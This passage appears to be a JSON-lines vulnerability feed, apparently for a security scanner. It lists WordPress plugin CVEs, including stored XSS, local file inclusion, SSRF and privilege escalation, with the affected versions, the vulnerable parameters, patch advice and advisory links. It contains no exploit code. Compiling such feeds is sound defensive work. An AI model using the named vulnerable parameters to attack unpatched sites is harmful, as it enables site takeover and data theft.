\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3002740\\\/export-wp-page-to-static-html\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3002740\\\/export-wp-page-to-static-html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4271","slug":"photospace-responsive","versionImpact":"2.1.1","versionEndExcluding":"2.2.0","description":"The Photospace Responsive plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018psres_button_size\u2019 parameter in versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bc98896-6ff9-40de-ace2-2ca331c2a44a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bc98896-6ff9-40de-ace2-2ca331c2a44a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2831424\\\/photospace-responsive\\\/trunk\\\/includes\\\/class-photospace-responsive-gallery.php?contextall=1&old=2544748&old_path=%2Fphotospace-responsive%2Ftrunk%2Fincludes%2Fclass-photospace-responsive-gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2831424\\\/photospace-responsive\\\/trunk\\\/includes\\\/class-photospace-responsive-gallery.php?contextall=1&old=2544748&old_path=%2Fphotospace-responsive%2Ftrunk%2Fincludes%2Fclass-photospace-responsive-gallery.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2966110%40photospace-responsive%2Ftrunk&old=2875667%40photospace-responsive%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2966110%40photospace-responsive%2Ftrunk&old=2875667%40photospace-responsive%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3063","slug":"shopperapproved-reviews","versionImpact":"2.1","versionEndExcluding":"2.2","description":"The Shopper Approved Reviews plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ajax_callback_update_sa_option() function in versions 2.0 to 2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shopperapproved-reviews\\\/trunk\\\/shopperapproved.php#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shopperapproved-reviews\\\/trunk\\\/shopperapproved.php#L154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c042b347-2884-436d-abd3-6931548f18d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c042b347-2884-436d-abd3-6931548f18d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5348","slug":"nd-elements","versionImpact":"2.1","versionEndExcluding":"2.2","description":"The Elements For Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.1 via the 'beforeafter_layout' attribute of the beforeafter widget, the 'eventsgrid_layout' attribute of the eventsgrid and list widgets, the 'marquee_layout' attribute of the marquee widget, the 'postgrid_layout' attribute of the postgrid widget, the 'woocart_layout'  attribute of the woocart widget, and the 'woogrid_layout' attribute of the woogrid widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e55b86e2-b42e-483d-93cd-2f09af64dbc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e55b86e2-b42e-483d-93cd-2f09af64dbc7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/beforeafter\\\/index.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/beforeafter\\\/index.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/eventsgrid\\\/index.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/eventsgrid\\\/index.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/list\\\/index.php#L401\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/list\\\/index.php#L401\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/marquee\\\/index.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/marquee\\\/index.php#L200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/postgrid\\\/index.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/postgrid\\\/index.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094318\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094318\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6046","slug":"eventon-lite","versionImpact":"2.1.7","versionEndExcluding":"2.2","description":"The EventON WordPress plugin before 2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored HTML Injection attacks even when the unfiltered_html capability is disallowed.","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97f1d403-ae96-4c90-8d47-9822f4d68033\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97f1d403-ae96-4c90-8d47-9822f4d68033\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12507","slug":"optio-dentistry","versionImpact":"2.1","versionEndExcluding":"2.2","description":"The Optio Dentistry plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'optio-lightbox' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optio-dentistry\\\/tags\\\/2.1\\\/optio-dentistry.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optio-dentistry\\\/tags\\\/2.1\\\/optio-dentistry.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optio-dentistry\\\/tags\\\/2.1\\\/optio-dentistry.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optio-dentistry\\\/tags\\\/2.1\\\/optio-dentistry.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208800%40optio-dentistry&new=3208800%40optio-dentistry&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208800%40optio-dentistry&new=3208800%40optio-dentistry&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4241118f-9bcb-4dec-abd2-7172db2cf445?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4241118f-9bcb-4dec-abd2-7172db2cf445?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4388","slug":"eventon-lite","versionImpact":"2.1.7","versionEndExcluding":"2.2","description":"The EventON WordPress plugin before 2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4086b62c-c527-4721-af63-7f2687c98648\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4086b62c-c527-4721-af63-7f2687c98648\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5639","slug":"team-showcase","versionImpact":"2.1","versionEndExcluding":"2.2","description":"The Team Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tmfshortcode' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3b26060-294e-4d4c-9295-0b08f533d5c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3b26060-294e-4d4c-9295-0b08f533d5c4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-showcase\\\/trunk\\\/team-manager-free.php?rev=2912143#L489\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-showcase\\\/trunk\\\/team-manager-free.php?rev=2912143#L489\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-showcase\\\/trunk\\\/team-manager-free.php?rev=2912143#L893\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-showcase\\\/trunk\\\/team-manager-free.php?rev=2912143#L893\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980614\\\/team-showcase\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980614\\\/team-showcase\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1784","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.19.0","versionEndExcluding":"2.19.1","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the uagb block in all versions up to, and including, 2.19.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.19.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-gutenberg\\\/tags\\\/2.19.0\\\/classes\\\/class-uagb-init-blocks.php#L1276\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-gutenberg\\\/tags\\\/2.19.0\\\/classes\\\/class-uagb-init-blocks.php#L1276\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243058%40ultimate-addons-for-gutenberg&new=3243058%40ultimate-addons-for-gutenberg&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243058%40ultimate-addons-for-gutenberg&new=3243058%40ultimate-addons-for-gutenberg&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ac33fd5-602b-4810-96e1-850ea6ee739d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ac33fd5-602b-4810-96e1-850ea6ee739d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1120","slug":"woo-thank-you-page-nextmove-lite","versionEndExcluding":"2.18.1","description":"The NextMove Lite \u2013 Thank You Page for WooCommerce and Finale Lite \u2013 Sales Countdown Timer & Discount for WooCommerce plugins for WordPress are vulnerable to unauthorized access of data due to a missing capability check on the download_tools_settings() function in all versions up to, and including, 2.17.0. This makes it possible for unauthenticated attackers to export system information that can aid attackers in an attack.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d9332be-2cf0-46cd-81e4-6436aeec0f83?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d9332be-2cf0-46cd-81e4-6436aeec0f83?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/finale-woocommerce-sales-countdown-timer-discount\\\/trunk\\\/includes\\\/wcct-xl-support.php#L710\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/finale-woocommerce-sales-countdown-timer-discount\\\/trunk\\\/includes\\\/wcct-xl-support.php#L710\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042127%40finale-woocommerce-sales-countdown-timer-discount&new=3042127%40finale-woocommerce-sales-countdown-timer-discount&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042127%40finale-woocommerce-sales-countdown-timer-discount&new=3042127%40finale-woocommerce-sales-countdown-timer-discount&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13451","slug":"bit-form","versionImpact":"2.17.5","versionEndExcluding":"2.17.6","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.17.4 via file uploads due to insufficient directory listing prevention and lack of randomization of file names. This makes it possible for unauthenticated attackers to extract sensitive data including files uploaded via a form. The vulnerability was partially patched in version 2.17.5.","recommendation":"Update to version 2.17.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Util\\\/FileHandler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Util\\\/FileHandler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233293\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233293\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b23bdba3-8947-47e4-b208-55e42865ab72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b23bdba3-8947-47e4-b208-55e42865ab72?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13450","slug":"bit-form","versionImpact":"2.17.4","versionEndExcluding":"2.17.5","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.17.4 via the Webhooks integration. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. The vulnerability can also be exploited in Multisite environments.","recommendation":"Update to version 2.17.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L1072\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L1072\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L1312\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L1312\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L190\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227207\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227207\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d935f4c5-5d69-42d9-be22-7a44d9aa885a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d935f4c5-5d69-42d9-be22-7a44d9aa885a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12190","slug":"bit-form","versionImpact":"2.17.3","versionEndExcluding":"2.17.4","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the bitform-form-entry-edit endpoint in all versions up to, and including,  2.17.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view all form submissions from other users.","recommendation":"Update to version 2.17.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204875\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/FormEntryView.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204875\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/FormEntryView.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209668\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/FormEntryView.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209668\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/FormEntryView.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce9dab37-4118-4e13-857c-9aa072d25edf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce9dab37-4118-4e13-857c-9aa072d25edf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12588","slug":"auxin-elements","versionImpact":"2.17.2","versionEndExcluding":"2.17.3","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Staff widget in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.17.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/staff.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/staff.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766cb6d0-1839-4d8c-819c-4e5dab408f6c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766cb6d0-1839-4d8c-819c-4e5dab408f6c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12209","slug":"wp-health","versionImpact":"2.17.0","versionEndExcluding":"2.17.1","description":"The WP Umbrella: Update Backup Restore & Monitoring plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.17.0 via the 'filename' parameter of the 'umbrella-restore' action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.17.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-health\\\/tags\\\/v2.16.4\\\/src\\\/Actions\\\/RestoreRouter.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-health\\\/tags\\\/v2.16.4\\\/src\\\/Actions\\\/RestoreRouter.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202883%40wp-health&new=3202883%40wp-health&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202883%40wp-health&new=3202883%40wp-health&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c74ce3e8-cab9-4cc6-a1ad-1e51f7268474?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c74ce3e8-cab9-4cc6-a1ad-1e51f7268474?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9545","slug":"auxin-elements","versionImpact":"2.17.0","versionEndExcluding":"2.17.1","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aux_contact_box and aux_gmaps shortcodes in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.17.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.16.2\\\/includes\\\/elements\\\/contact-box.php#L432\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.16.2\\\/includes\\\/elements\\\/contact-box.php#L432\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.16.2\\\/includes\\\/elements\\\/gmap.php#L285\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.16.2\\\/includes\\\/elements\\\/gmap.php#L285\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65ee0ac8-3fa0-4a7d-a786-36a914242634?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65ee0ac8-3fa0-4a7d-a786-36a914242634?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8486","slug":"auxin-elements","versionImpact":"2.16.3","versionEndExcluding":"2.16.4","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in the Modern Heading and Icon Picker widgets all versions up to, and including, 2.16.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.16.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09316a23-3a99-47f2-9c3f-795dc0a4a792?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09316a23-3a99-47f2-9c3f-795dc0a4a792?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/heading-modern.php#L1168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/heading-modern.php#L1168\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/heading-modern.php#L1205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/heading-modern.php#L1205\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/icon.php#L397\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/icon.php#L397\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161415\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161415\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
